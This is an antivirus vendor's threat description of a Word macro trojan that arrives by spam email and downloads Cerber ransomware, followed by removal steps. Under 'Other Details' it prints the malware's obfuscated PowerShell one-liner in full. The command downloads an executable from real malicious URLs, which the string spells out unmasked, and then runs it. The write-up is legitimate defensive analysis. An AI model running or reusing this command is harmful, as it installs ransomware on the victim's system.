Analysis by: Byron Jon Gelera

ALIASES:

TrojanDownloader:O97M/Donoff (Microsoft); VBA/TrojanDownloader.Agent.EEE (ESET-NOD32)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Spammed via email

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

It does not have any propagation routine.

It does not have any backdoor routine.

It executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

  TECHNICAL DETAILS

File Size: 76,570 bytes
File Type: DOC
Memory Resident: No
Initial Samples Received Date: 14 Sep 2017
Payload: Downloads files

Arrival Details

This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.

Propagation

This Trojan does not have any propagation routine.

Backdoor Routine

This Trojan does not have any backdoor routine.

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

  • http://{BLOCKED}nmaster.top/support.php?f=3
  • http://{BLOCKED}verti.top/support.php?f=3
  • http://{BLOCKED}ceramics.com.vn/image/flags/1

It saves the files it downloads using the following names:

  • %AppDataLocal%\Temp{Random numbers}.exe
    where {Random numbers} can be randomly generated from 1 to 65536

(Note: %AppDataLocal% is the Application Data folder found in Local Settings, where it is usually C:\Documents and Settings\{user name}\Local Settings\Application Data on Windows 2000, Windows Server 2003, and Windows XP (32- and 64-bit); C:\Users\{user name}\AppData\Local on Windows Vista (32- and 64-bit), Windows 7 (32- and 64-bit), Windows 8 (32- and 64-bit), Windows 8.1 (32- and 64-bit), Windows Server 2008, and Windows Server 2012.)

Trend Micro detects the dowloaded file as:

  • Ransom_CERBER.SMALY0

It then executes the downloaded files. As a result, malicious routines of the downloaded files are exhibited on the affected system.

Other Details

This Trojan does the following:

  • It uses the following Powershell to download and execute a malicious file:
      powershell.exe $vGeuXRnUX = new-object System.Net.WebClient;$ikdGAwQ = new-object random; $OoamRxZ = 'hgYtgYtgYpgY:gY/gY/gYkgYogYngYggYdgYogYngYmgYagYsgYtgYegYrgY.gYtgYogYpgY/gYsgYugYpgYpgYogYrgYtgY.gYpgYhgYpgY?gYfgY=gY3gY,gYhgYtgYtgYpgY:gY/gY/gYtgYogYngYsgYegYrgYvgYegYrgYtgYigY.gYtgYogYpgY/gYsgYugYpgYpgYogYrgYtgY.gYpgYhgYpgY?gYfgY=gY3gY,gYhgYtgYtgYpgY:gY/gY/gYlgYogYngYggYvgYagYngYcgYegYrgYagYmgYigYcgYsgY.gYcgYogYmgY.gYvgYngY/gYigYmgYagYggYegY/gYfgYlgYagYggYsgY/gY.gY.gY.gY/gY1' -replace 'gY', '';$ErvzDXtNFD = $OoamRxZ.Split(',');$XDEs = $ikdGAwQ.next(1, 65536);$VIQSv = $env:temp + '' + $XDEs + '.exe';foreach($dIgeW in $ErvzDXtNFD){try{$vGeuXRnUX.DownloadFile($dIgeW.ToString(), $VIQSv);Start-Process $VIQSv;break;}catch{write-host $_.Exception.Message;}}

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 13.658.02
FIRST VSAPI PATTERN DATE: 14 Sep 2017
VSAPI OPR PATTERN File: 13.659.00
VSAPI OPR PATTERN Date: 15 Sep 2017

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Search and delete this file

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.  
  • %AppDataLocal%\Temp{Random numbers}.exe

Step 4

Scan your computer with your Trend Micro product to delete files detected as W2KM_POWMET.SIOH. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

Step 5

Enable the macro virus protection in Microsoft Office Applications

[ Learn More ]


Did this description help? Tell us how we did.

Related Malware